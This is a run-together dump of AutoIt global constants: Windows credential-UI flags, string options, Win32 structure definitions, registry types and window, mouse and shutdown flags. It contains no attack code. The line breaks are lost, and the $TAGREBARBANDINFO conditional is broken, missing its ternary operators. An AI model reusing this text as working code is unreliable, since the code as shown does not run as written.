$CREDUI_FLAGS_EXCLUDE_CERTIFICATES = 8 GLOBAL CONST $CREDUI_FLAGS_EXPECT_CONFIRMATION = 131072 GLOBAL CONST $CREDUI_FLAGS_GENERIC_CREDENTIALS = 262144 GLOBAL CONST $CREDUI_FLAGS_INCORRECT_PASSWORD = 1 GLOBAL CONST $CREDUI_FLAGS_KEEP_USERNAME = 1048576 GLOBAL CONST $CREDUI_FLAGS_PASSWORD_ONLY_OK = 512 GLOBAL CONST $CREDUI_FLAGS_PERSIST = 4096 GLOBAL CONST $CREDUI_FLAGS_REQUEST_ADMINISTRATOR = 4 GLOBAL CONST $CREDUI_FLAGS_REQUIRE_CERTIFICATE = 16 GLOBAL CONST $CREDUI_FLAGS_REQUIRE_SMARTCARD = 256 GLOBAL CONST $CREDUI_FLAGS_SERVER_CREDENTIAL = 16384 GLOBAL CONST $CREDUI_FLAGS_SHOW_SAVE_CHECK_BOX = 64 GLOBAL CONST $CREDUI_FLAGS_USERNAME_TARGET_CREDENTIALS = 524288 GLOBAL CONST $CREDUI_FLAGS_VALIDATE_USERNAME = 1024 GLOBAL CONST $CREDUIWIN_AUTHPACKAGE_ONLY = 16 GLOBAL CONST $CREDUIWIN_CHECKBOX = 2 GLOBAL CONST $CREDUIWIN_ENUMERATE_ADMINS = 256 GLOBAL CONST $CREDUIWIN_ENUMERATE_CURRENT_USER = 512 GLOBAL CONST $CREDUIWIN_GENERIC = 1 GLOBAL CONST $CREDUIWIN_IN_CRED_ONLY = 32 GLOBAL CONST $CREDUIWIN_SECURE_PROMPT = 4096 GLOBAL CONST $CREDUIWIN_PACK_32_WOW = 268435456 GLOBAL CONST $CREDUIWIN_PREPROMPTING = 8192 GLOBAL CONST $STR_NOCASESENSE = 0 GLOBAL CONST $STR_CASESENSE = 1 GLOBAL CONST $STR_NOCASESENSEBASIC = 2 GLOBAL CONST $STR_STRIPLEADING = 1 GLOBAL CONST $STR_STRIPTRAILING = 2 GLOBAL CONST $STR_STRIPSPACES = 4 GLOBAL CONST $STR_STRIPALL = 8 GLOBAL CONST $STR_CHRSPLIT = 0 GLOBAL CONST $STR_ENTIRESPLIT = 1 GLOBAL CONST $STR_NOCOUNT = 2 GLOBAL CONST $STR_REGEXPMATCH = 0 GLOBAL CONST $STR_REGEXPARRAYMATCH = 1 GLOBAL CONST $STR_REGEXPARRAYFULLMATCH = 2 GLOBAL CONST $STR_REGEXPARRAYGLOBALMATCH = 3 GLOBAL CONST $STR_REGEXPARRAYGLOBALFULLMATCH = 4 GLOBAL CONST $STR_ENDISSTART = 0 GLOBAL CONST $STR_ENDNOTSTART = 1 GLOBAL CONST $SB_ANSI = 1 GLOBAL CONST $SB_UTF16LE = 2 GLOBAL CONST $SB_UTF16BE = 3 GLOBAL CONST $SB_UTF8 = 4 GLOBAL CONST $SE_UTF16 = 0 GLOBAL CONST $SE_ANSI = 1 GLOBAL CONST $SE_UTF8 = 2 GLOBAL CONST $STR_UTF16 = 0 GLOBAL CONST $STR_UCS2 = 1 GLOBAL CONST $TAGPOINT = "struct;long X;long Y;endstruct" GLOBAL CONST $TAGRECT = "struct;long Left;long Top;long Right;long Bottom;endstruct" GLOBAL CONST $TAGSIZE = "struct;long X;long Y;endstruct" GLOBAL CONST $TAGMARGINS = "int cxLeftWidth;int cxRightWidth;int cyTopHeight;int cyBottomHeight" GLOBAL CONST $TAGFILETIME = "struct;dword Lo;dword Hi;endstruct" GLOBAL CONST $TAGSYSTEMTIME = "struct;word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds;endstruct" GLOBAL CONST $TAGTIME_ZONE_INFORMATION = "struct;long Bias;wchar StdName[32];word StdDate[8];long StdBias;wchar DayName[32];word DayDate[8];long DayBias;endstruct" GLOBAL CONST $TAGNMHDR = "struct;hwnd hWndFrom;uint_ptr IDFrom;INT Code;endstruct" GLOBAL CONST $TAGCOMBOBOXEXITEM = "uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;" & "int Indent;lparam Param" GLOBAL CONST $TAGNMCBEDRAGBEGIN = $TAGNMHDR & ";int ItemID;wchar szText[260]" GLOBAL CONST $TAGNMCBEENDEDIT = $TAGNMHDR & ";bool fChanged;int NewSelection;wchar szText[260];int Why" GLOBAL CONST $TAGNMCOMBOBOXEX = $TAGNMHDR & ";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;" & "int SelectedImage;int OverlayImage;int Indent;lparam Param" GLOBAL CONST $TAGDTPRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;" & "word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;" & "word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid" GLOBAL CONST $TAGNMDATETIMECHANGE = $TAGNMHDR & ";dword Flag;" & $TAGSYSTEMTIME GLOBAL CONST $TAGNMDATETIMEFORMAT = $TAGNMHDR & ";ptr Format;" & $TAGSYSTEMTIME & ";ptr pDisplay;wchar Display[64]" GLOBAL CONST $TAGNMDATETIMEFORMATQUERY = $TAGNMHDR & ";ptr Format;struct;long SizeX;long SizeY;endstruct" GLOBAL CONST $TAGNMDATETIMEKEYDOWN = $TAGNMHDR & ";int VirtKey;ptr Format;" & $TAGSYSTEMTIME GLOBAL CONST $TAGNMDATETIMESTRING = $TAGNMHDR & ";ptr UserString;" & $TAGSYSTEMTIME & ";dword Flags" GLOBAL CONST $TAGEVENTLOGRECORD = "dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;" & "word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClosingRecordNumber;dword StringOffset;" & "dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_BLUR = "float Radius; bool ExpandEdge" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_BRIGHTNESSCONTRAST = "int BrightnessLevel; int ContrastLevel" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_COLORBALANCE = "int CyanRed; int MagentaGreen; int YellowBlue" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_COLORCURVE = "int Adjustment; int Channel; int AdjustValue" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_COLORLUT = "byte LutB[256]; byte LutG[256]; byte LutR[256]; byte LutA[256]" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_HUESATURATIONLIGHTNESS = "int HueLevel; int SaturationLevel; int LightnessLevel" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_LEVELS = "int Highlight; int Midtone; int Shadow" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_REDEYECORRECTION = "uint NumberOfAreas; ptr Areas" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_SHARPEN = "float Radius; float Amount" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_TINT = "int Hue; int Amount" GLOBAL CONST $TAGGDIPBITMAPDATA = "uint Width;uint Height;int Stride;int Format;ptr Scan0;uint_ptr Reserved" GLOBAL CONST $TAGGDIPCOLORMATRIX = "float m[25]" GLOBAL CONST $TAGGDIPENCODERPARAM = "struct;byte GUID[16];ulong NumberOfValues;ulong Type;ptr Values;endstruct" GLOBAL CONST $TAGGDIPENCODERPARAMS = "uint Count;" & $TAGGDIPENCODERPARAM GLOBAL CONST $TAGGDIPRECTF = "struct;float X;float Y;float Width;float Height;endstruct" GLOBAL CONST $TAGGDIPSTARTUPINPUT = "uint Version;ptr Callback;bool NoThread;bool NoCodecs" GLOBAL CONST $TAGGDIPSTARTUPOUTPUT = "ptr HookProc;ptr UnhookProc" GLOBAL CONST $TAGGDIPIMAGECODECINFO = "byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;" & "ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask" GLOBAL CONST $TAGGDIPPENCODERPARAMS = "uint Count;byte Params[1]" GLOBAL CONST $TAGHDITEM = "uint Mask;int XY;ptr Text;handle hBMP;int TextMax;int Fmt;lparam Param;int Image;int Order;uint Type;ptr pFilter;uint State" GLOBAL CONST $TAGNMHDDISPINFO = $TAGNMHDR & ";int Item;uint Mask;ptr Text;int TextMax;int Image;lparam lParam" GLOBAL CONST $TAGNMHDFILTERBTNCLICK = $TAGNMHDR & ";int Item;" & $TAGRECT GLOBAL CONST $TAGNMHEADER = $TAGNMHDR & ";int Item;int Button;ptr pItem" GLOBAL CONST $TAGGETIPADDRESS = "byte Field4;byte Field3;byte Field2;byte Field1" GLOBAL CONST $TAGNMIPADDRESS = $TAGNMHDR & ";int Field;int Value" GLOBAL CONST $TAGLVFINDINFO = "struct;uint Flags;ptr Text;lparam Param;" & $TAGPOINT & ";uint Direction;endstruct" GLOBAL CONST $TAGLVHITTESTINFO = $TAGPOINT & ";uint Flags;int Item;int SubItem;int iGroup" GLOBAL CONST $TAGLVITEM = "struct;uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;" & "int Indent;int GroupID;uint Columns;ptr pColumns;ptr piColFmt;int iGroup;endstruct" GLOBAL CONST $TAGNMLISTVIEW = $TAGNMHDR & ";int Item;int SubItem;uint NewState;uint OldState;uint Changed;" & "struct;long ActionX;long ActionY;endstruct;lparam Param" GLOBAL CONST $TAGNMLVCUSTOMDRAW = "struct;" & $TAGNMHDR & ";dword dwDrawStage;handle hdc;" & $TAGRECT & ";dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam;endstruct" & ";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;" & "int iIconPhase;int iPartID;int iStateID;struct;long TextLeft;long TextTop;long TextRight;long TextBottom;endstruct;uint uAlign" GLOBAL CONST $TAGNMLVDISPINFO = $TAGNMHDR & ";" & $TAGLVITEM GLOBAL CONST $TAGNMLVFINDITEM = $TAGNMHDR & ";int Start;" & $TAGLVFINDINFO GLOBAL CONST $TAGNMLVGETINFOTIP = $TAGNMHDR & ";dword Flags;ptr Text;int TextMax;int Item;int SubItem;lparam lParam" GLOBAL CONST $TAGNMITEMACTIVATE = $TAGNMHDR & ";int Index;int SubItem;uint NewState;uint OldState;uint Changed;" & $TAGPOINT & ";lparam lParam;uint KeyFlags" GLOBAL CONST $TAGNMLVKEYDOWN = "align 1;" & $TAGNMHDR & ";word VKey;uint Flags" GLOBAL CONST $TAGNMLVSCROLL = $TAGNMHDR & ";int DX;int DY" GLOBAL CONST $TAGMCHITTESTINFO = "uint Size;" & $TAGPOINT & ";uint Hit;" & $TAGSYSTEMTIME & ";" & $TAGRECT & ";int iOffset;int iRow;int iCol" GLOBAL CONST $TAGMCMONTHRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short Span" GLOBAL CONST $TAGMCRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short MinSet;short MaxSet" GLOBAL CONST $TAGMCSELRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds" GLOBAL CONST $TAGNMDAYSTATE = $TAGNMHDR & ";" & $TAGSYSTEMTIME & ";int DayState;ptr pDayState" GLOBAL CONST $TAGNMSELCHANGE = $TAGNMHDR & ";struct;word BegYear;word BegMonth;word BegDOW;word BegDay;word BegHour;word BegMinute;word BegSecond;word BegMSeconds;endstruct;" & "struct;word EndYear;word EndMonth;word EndDOW;word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds;endstruct" GLOBAL CONST $TAGNMOBJECTNOTIFY = $TAGNMHDR & ";int Item;ptr piid;ptr pObject;long Result;dword dwFlags" GLOBAL CONST $TAGNMTCKEYDOWN = "align 1;" & $TAGNMHDR & ";word VKey;uint Flags" GLOBAL CONST $TAGTVITEM = "struct;uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;" & "int Children;lparam Param;endstruct" GLOBAL CONST $TAGTVITEMEX = "struct;" & $TAGTVITEM & ";int Integral;uint uStateEx;hwnd hwnd;int iExpandedImage;int iReserved;endstruct" GLOBAL CONST $TAGNMTREEVIEW = $TAGNMHDR & ";uint Action;" & "struct;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;" & "ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;endstruct;" & "struct;uint NewMask;handle NewhItem;uint NewState;uint NewStateMask;" & "ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;lparam NewParam;endstruct;" & "struct;long PointX;long PointY;endstruct" GLOBAL CONST $TAGNMTVCUSTOMDRAW = "struct;" & $TAGNMHDR & ";dword DrawStage;handle HDC;" & $TAGRECT & ";dword_ptr ItemSpec;uint ItemState;lparam ItemParam;endstruct" & ";dword ClrText;dword ClrTextBk;int Level" GLOBAL CONST $TAGNMTVDISPINFO = $TAGNMHDR & ";" & $TAGTVITEM GLOBAL CONST $TAGNMTVGETINFOTIP = $TAGNMHDR & ";ptr Text;int TextMax;handle hItem;lparam lParam" GLOBAL CONST $TAGNMTVITEMCHANGE = $TAGNMHDR & ";uint Changed;handle hItem;uint StateNew;uint StateOld;lparam lParam;" GLOBAL CONST $TAGTVHITTESTINFO = $TAGPOINT & ";uint Flags;handle Item" GLOBAL CONST $TAGNMTVKEYDOWN = "align 1;" & $TAGNMHDR & ";word VKey;uint Flags" GLOBAL CONST $TAGNMMOUSE = $TAGNMHDR & ";dword_ptr ItemSpec;dword_ptr ItemData;" & $TAGPOINT & ";lparam HitInfo" GLOBAL CONST $TAGTOKEN_PRIVILEGES = "dword Count;align 4;int64 LUID;dword Attributes" GLOBAL CONST $TAGIMAGEINFO = "handle hBitmap;handle hMask;int Unused1;int Unused2;" & $TAGRECT GLOBAL CONST $TAGMENUINFO = "dword Size;INT Mask;dword Style;uint YMax;handle hBack;dword ContextHelpID;ulong_ptr MenuData" GLOBAL CONST $TAGMENUITEMINFO = "uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;" & "ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem" GLOBAL CONST $TAGREBARBANDINFO = "uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;" & "int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;" & "uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader" & ((@OSVERSION = "WIN_XP" ) "" ";" & $TAGRECT & ";uint uChevronState" ) GLOBAL CONST $TAGNMREBARAUTOBREAK = $TAGNMHDR & ";uint uBand;uint wID;lparam lParam;uint uMsg;uint fStyleCurrent;bool fAutoBreak" GLOBAL CONST $TAGNMRBAUTOSIZE = $TAGNMHDR & ";bool fChanged;" & "struct;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;endstruct;" & "struct;long ActualLeft;long ActualTop;long ActualRight;long ActualBottom;endstruct" GLOBAL CONST $TAGNMREBAR = $TAGNMHDR & ";dword dwMask;uint uBand;uint fStyle;uint wID;lparam lParam" GLOBAL CONST $TAGNMREBARCHEVRON = $TAGNMHDR & ";uint uBand;uint wID;lparam lParam;" & $TAGRECT & ";lparam lParamNM" GLOBAL CONST $TAGNMREBARCHILDSIZE = $TAGNMHDR & ";uint uBand;uint wID;" & "struct;long CLeft;long CTop;long CRight;long CBottom;endstruct;" & "struct;long BLeft;long BTop;long BRight;long BBottom;endstruct" GLOBAL CONST $TAGCOLORSCHEME = "dword Size;dword BtnHighlight;dword BtnShadow" GLOBAL CONST $TAGNMTOOLBAR = $TAGNMHDR & ";int iItem;" & "struct;int iBitmap;int idCommand;byte fsState;byte fsStyle;dword_ptr dwData;int_ptr iString;endstruct" & ";int cchText;ptr pszText;" & $TAGRECT GLOBAL CONST $TAGNMTBHOTITEM = $TAGNMHDR & ";int idOld;int idNew;dword dwFlags" GLOBAL CONST $TAGTBBUTTON = "int Bitmap;int Command;byte State;byte Style;dword_ptr Param;int_ptr String" GLOBAL CONST $TAGTBBUTTONINFO = "uint Size;dword Mask;int Command;int Image;byte State;byte Style;word CX;dword_ptr Param;ptr Text;int TextMax" GLOBAL CONST $TAGNETRESOURCE = "dword Scope;dword Type;dword DisplayType;dword Usage;ptr LocalName;ptr RemoteName;ptr Comment;ptr Provider" GLOBAL CONST $TAGOVERLAPPED = "ulong_ptr Internal;ulong_ptr InternalHigh;struct;dword Offset;dword OffsetHigh;endstruct;handle hEvent" GLOBAL CONST $TAGOPENFILENAME = "dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;" & "dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;" & "ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx" GLOBAL CONST $TAGBITMAPINFOHEADER = "struct;dword biSize;long biWidth;long biHeight;word biPlanes;word biBitCount;" & "dword biCompression;dword biSizeImage;long biXPelsPerMeter;long biYPelsPerMeter;dword biClrUsed;dword biClrImportant;endstruct" GLOBAL CONST $TAGBITMAPINFO = $TAGBITMAPINFOHEADER & ";dword biRGBQuad[1]" GLOBAL CONST $TAGBLENDFUNCTION = "byte Op;byte Flags;byte Alpha;byte Format" GLOBAL CONST $TAGGUID = "struct;ulong Data1;ushort Data2;ushort Data3;byte Data4[8];endstruct" GLOBAL CONST $TAGWINDOWPLACEMENT = "uint length;uint flags;uint showCmd;long ptMinPosition[2];long ptMaxPosition[2];long rcNormalPosition[4]" GLOBAL CONST $TAGWINDOWPOS = "hwnd hWnd;hwnd InsertAfter;int X;int Y;int CX;int CY;uint Flags" GLOBAL CONST $TAGSCROLLINFO = "uint cbSize;uint fMask;int nMin;int nMax;uint nPage;int nPos;int nTrackPos" GLOBAL CONST $TAGSCROLLBARINFO = "dword cbSize;" & $TAGRECT & ";int dxyLineButton;int xyThumbTop;" & "int xyThumbBottom;int reserved;dword rgstate[6]" GLOBAL CONST $TAGLOGFONT = "struct;long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;" & "byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32];endstruct" GLOBAL CONST $TAGKBDLLHOOKSTRUCT = "dword vkCode;dword scanCode;dword flags;dword time;ulong_ptr dwExtraInfo" GLOBAL CONST $TAGPROCESS_INFORMATION = "handle hProcess;handle hThread;dword ProcessID;dword ThreadID" GLOBAL CONST $TAGSTARTUPINFO = "dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;" & "dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;" & "handle StdOutput;handle StdError" GLOBAL CONST $TAGSECURITY_ATTRIBUTES = "dword Length;ptr Descriptor;bool InheritHandle" GLOBAL CONST $TAGWIN32_FIND_DATA = "dword dwFileAttributes;dword ftCreationTime[2];dword ftLastAccessTime[2];dword ftLastWriteTime[2];dword nFileSizeHigh;dword nFileSizeLow;dword dwReserved0;dword dwReserved1;wchar cFileName[260];wchar cAlternateFileName[14]" GLOBAL CONST $TAGTEXTMETRIC = "long tmHeight;long tmAscent;long tmDescent;long tmInternalLeading;long tmExternalLeading;" & "long tmAveCharWidth;long tmMaxCharWidth;long tmWeight;long tmOverhang;long tmDigitizedAspectX;long tmDigitizedAspectY;" & "wchar tmFirstChar;wchar tmLastChar;wchar tmDefaultChar;wchar tmBreakChar;byte tmItalic;byte tmUnderlined;byte tmStruckOut;" & "byte tmPitchAndFamily;byte tmCharSet" GLOBAL CONST $COINIT_APARTMENTTHREADED = 2 GLOBAL CONST $COINIT_DISABLE_OLE1DDE = 4 GLOBAL CONST $COINIT_MULTITHREADED = 0 GLOBAL CONST $COINIT_SPEED_OVER_MEMORY = 8 GLOBAL CONST $OPT_COORDSRELATIVE = 0 GLOBAL CONST $OPT_COORDSABSOLUTE = 1 GLOBAL CONST $OPT_COORDSCLIENT = 2 GLOBAL CONST $OPT_ERRORSILENT = 0 GLOBAL CONST $OPT_ERRORFATAL = 1 GLOBAL CONST $OPT_CAPSNOSTORE = 0 GLOBAL CONST $OPT_CAPSSTORE = 1 GLOBAL CONST $OPT_MATCHSTART = 1 GLOBAL CONST $OPT_MATCHANY = 2 GLOBAL CONST $OPT_MATCHEXACT = 3 GLOBAL CONST $OPT_MATCHADVANCED = 4 GLOBAL CONST $CCS_TOP = 1 GLOBAL CONST $CCS_NOMOVEY = 2 GLOBAL CONST $CCS_BOTTOM = 3 GLOBAL CONST $CCS_NORESIZE = 4 GLOBAL CONST $CCS_NOPARENTALIGN = 8 GLOBAL CONST $CCS_NOHILITE = 16 GLOBAL CONST $CCS_ADJUSTABLE = 32 GLOBAL CONST $CCS_NODIVIDER = 64 GLOBAL CONST $CCS_VERT = 128 GLOBAL CONST $CCS_LEFT = 129 GLOBAL CONST $CCS_NOMOVEX = 130 GLOBAL CONST $CCS_RIGHT = 131 GLOBAL CONST $DT_DRIVETYPE = 1 GLOBAL CONST $DT_SSDSTATUS = 2 GLOBAL CONST $DT_BUSTYPE = 3 GLOBAL CONST $PROXY_IE = 0 GLOBAL CONST $PROXY_NONE = 1 GLOBAL CONST $PROXY_SPECIFIED = 2 GLOBAL CONST $OBJID_WINDOW = 0 GLOBAL CONST $OBJID_TITLEBAR = 4294967294 GLOBAL CONST $OBJID_SIZEGRIP = 4294967289 GLOBAL CONST $OBJID_CARET = 4294967288 GLOBAL CONST $OBJID_CURSOR = 4294967287 GLOBAL CONST $OBJID_ALERT = 4294967286 GLOBAL CONST $OBJID_SOUND = 4294967285 GLOBAL CONST $DLG_CENTERONTOP = 0 GLOBAL CONST $DLG_NOTITLE = 1 GLOBAL CONST $DLG_NOTONTOP = 2 GLOBAL CONST $DLG_TEXTLEFT = 4 GLOBAL CONST $DLG_TEXTRIGHT = 8 GLOBAL CONST $DLG_MOVEABLE = 16 GLOBAL CONST $DLG_TEXTVCENTER = 32 GLOBAL CONST $IDC_UNKNOWN = 0 GLOBAL CONST $IDC_APPSTARTING = 1 GLOBAL CONST $IDC_ARROW = 2 GLOBAL CONST $IDC_CROSS = 3 GLOBAL CONST $IDC_HAND = 32649 GLOBAL CONST $IDC_HELP = 4 GLOBAL CONST $IDC_IBEAM = 5 GLOBAL CONST $IDC_ICON = 6 GLOBAL CONST $IDC_NO = 7 GLOBAL CONST $IDC_SIZE = 8 GLOBAL CONST $IDC_SIZEALL = 9 GLOBAL CONST $IDC_SIZENESW = 10 GLOBAL CONST $IDC_SIZENS = 11 GLOBAL CONST $IDC_SIZENWSE = 12 GLOBAL CONST $IDC_SIZEWE = 13 GLOBAL CONST $IDC_UPARROW = 14 GLOBAL CONST $IDC_WAIT = 15 GLOBAL CONST $IDI_APPLICATION = 32512 GLOBAL CONST $IDI_ASTERISK = 32516 GLOBAL CONST $IDI_EXCLAMATION = 32515 GLOBAL CONST $IDI_HAND = 32513 GLOBAL CONST $IDI_QUESTION = 32514 GLOBAL CONST $IDI_WINLOGO = 32517 GLOBAL CONST $IDI_SHIELD = 32518 GLOBAL CONST $IDI_ERROR = $IDI_HAND GLOBAL CONST $IDI_INFORMATION = $IDI_ASTERISK GLOBAL CONST $IDI_WARNING = $IDI_EXCLAMATION GLOBAL CONST $SD_LOGOFF = 0 GLOBAL CONST $SD_SHUTDOWN = 1 GLOBAL CONST $SD_REBOOT = 2 GLOBAL CONST $SD_FORCE = 4 GLOBAL CONST $SD_POWERDOWN = 8 GLOBAL CONST $SD_FORCEHUNG = 16 GLOBAL CONST $SD_STANDBY = 32 GLOBAL CONST $SD_HIBERNATE = 64 GLOBAL CONST $STDIN_CHILD = 1 GLOBAL CONST $STDOUT_CHILD = 2 GLOBAL CONST $STDERR_CHILD = 4 GLOBAL CONST $STDERR_MERGED = 8 GLOBAL CONST $STDIO_INHERIT_PARENT = 16 GLOBAL CONST $RUN_CREATE_NEW_CONSOLE = 65536 GLOBAL CONST $UBOUND_DIMENSIONS = 0 GLOBAL CONST $UBOUND_ROWS = 1 GLOBAL CONST $UBOUND_COLUMNS = 2 GLOBAL CONST $MOUSEEVENTF_ABSOLUTE = 32768 GLOBAL CONST $MOUSEEVENTF_MOVE = 1 GLOBAL CONST $MOUSEEVENTF_LEFTDOWN = 2 GLOBAL CONST $MOUSEEVENTF_LEFTUP = 4 GLOBAL CONST $MOUSEEVENTF_RIGHTDOWN = 8 GLOBAL CONST $MOUSEEVENTF_RIGHTUP = 16 GLOBAL CONST $MOUSEEVENTF_MIDDLEDOWN = 32 GLOBAL CONST $MOUSEEVENTF_MIDDLEUP = 64 GLOBAL CONST $MOUSEEVENTF_WHEEL = 2048 GLOBAL CONST $MOUSEEVENTF_XDOWN = 128 GLOBAL CONST $MOUSEEVENTF_XUP = 256 GLOBAL CONST $REG_NONE = 0 GLOBAL CONST $REG_SZ = 1 GLOBAL CONST $REG_EXPAND_SZ = 2 GLOBAL CONST $REG_BINARY = 3 GLOBAL CONST $REG_DWORD = 4 GLOBAL CONST $REG_DWORD_LITTLE_ENDIAN = 4 GLOBAL CONST $REG_DWORD_BIG_ENDIAN = 5 GLOBAL CONST $REG_LINK = 6 GLOBAL CONST $REG_MULTI_SZ = 7 GLOBAL CONST $REG_RESOURCE_LIST = 8 GLOBAL CONST $REG_FULL_RESOURCE_DESCRIPTOR = 9 GLOBAL CONST $REG_RESOURCE_REQUIREMENTS_LIST = 10 GLOBAL CONST $REG_QWORD = 11 GLOBAL CONST $REG_QWORD_LITTLE_ENDIAN = 11 GLOBAL CONST $HWND_BOTTOM = 1 GLOBAL CONST $HWND_NOTOPMOST = + 4294967294 GLOBAL CONST $HWND_TOP = 0 GLOBAL CONST $HWND_TOPMOST = + 4294967295 GLOBAL CONST $SWP_NOSIZE = 1 GLOBAL CONST $SWP_NOMOVE = 2 GLOBAL CONST $SWP_NOZORDER = 4 GLOBAL CONST $SWP_NOREDRAW = 8 GLOBAL CONST $SWP_NOACTIVATE = 16 GLOBAL CONST $SWP_FRAMECHANGED = 32 GLOBAL CONST $SWP_DRAWFRAME = 32 GLOBAL CONST $SWP_SHOWWINDOW = 64 GLOBAL CONST $SWP_HIDEWINDOW = 128 GLOBAL CONST $SWP_NOCOPYBITS = 256 GLOBAL CONST $SWP_NOOWNERZORDER = 512 GLOBAL CONST $SWP_NOREPOSITION = 512 GLOBAL CONST $SWP_NOSENDCHANGING = 1024 GLOBAL CONST $SWP_DEFERERASE = 8192 GLOBAL CONST $SWP_ASYNCWINDOWPOS = 16384 GLOBAL CONST $KEYWORD_DEFAULT = 1 GLOBAL CONST $KEYWORD_NULL = 2 GLOBAL CONST $DECLARED_LOCAL = + 4294967295 GLOBAL CONST $DECLARED_UNKNOWN = 0 GLOBAL CONST $DECLARED_GLOBAL = 1 GLOBAL CONST $ASSIGN_CREATE = 0 GLOBAL CONST $ASSIGN_FORCELOCAL = 1 GLOBAL CONST $ASSIGN_FORCEGLOBAL = 2 GLOBAL CONST $ASSIGN_EXISTFAIL = 4 GLOBAL CONST $BI_ENABLE = 0 GLOBAL CONST $BI_DISABLE = 1 GLOBAL CONST $BREAK_ENABLE = 1 GLOBAL CONST $BREAK_DISABLE = 0 GLOBAL CONST $CDTRAY_OPEN = "open" GLOBAL CONST $CDTRAY_CLOSED = "closed" GLOBAL CONST $SEND_DEFAULT = 0 GLOBAL CONST $SEND_RAW = 1 GLOBAL CONST $DIR_DEFAULT = 0 GLOBAL CONST $DIR_EXTENDED = 1 GLOBAL CONST $DIR_NORECURSE = 2 GLOBAL CONST $DIR_REMOVE = 1 GLOBAL CONST $DT_ALL = "ALL" GLOBAL CONST $DT_CDROM = "CDROM" GLOBAL CONST $DT_REMOVABLE = "REMOVABLE" GLOBAL CONST $DT_FIXED = "FIXED" GLOBAL CONST $DT_NETWORK = "NETWORK" GLOBAL CONST $DT_RAMDISK = "RAMDISK" GLOBAL CONST $DT_UNKNOWN = "UNKNOWN" GLOBAL CONST $DT_UNDEFINED = 1 GLOBAL CONST $DT_FAT = "FAT" GLOBAL CONST $DT_FAT32 = "FAT32" GLOBAL CONST $DT_EXFAT = "exFAT" GLOBAL CONST $DT_NTFS = "NTFS" GLOBAL CONST $DT_NWFS = "NWFS" GLOBAL CONST $DT_CDFS = "CDFS" GLOBAL CONST $DT_UDF = "UDF" GLOBAL CONST $DMA_DEFAULT = 0 GLOBAL CONST $DMA_PERSISTENT = 1 GLOBAL CONST $DMA_AUTHENTICATION = 8 GLOBAL CONST $DS_UNKNOWN = "UNKNOWN" GLOBAL CONST $DS_READY = "READY" GLOBAL CONST $DS_NOTREADY = "NOTREADY" GLOBAL CONST $DS_INVALID = "INVALID" GLOBAL CONST $MOUSE_CLICK_LEFT = "left" GLOBAL CONST $MOUSE_CLICK_RIGHT = "right" GLOBAL CONST $MOUSE_CLICK_MIDDLE = "middle" 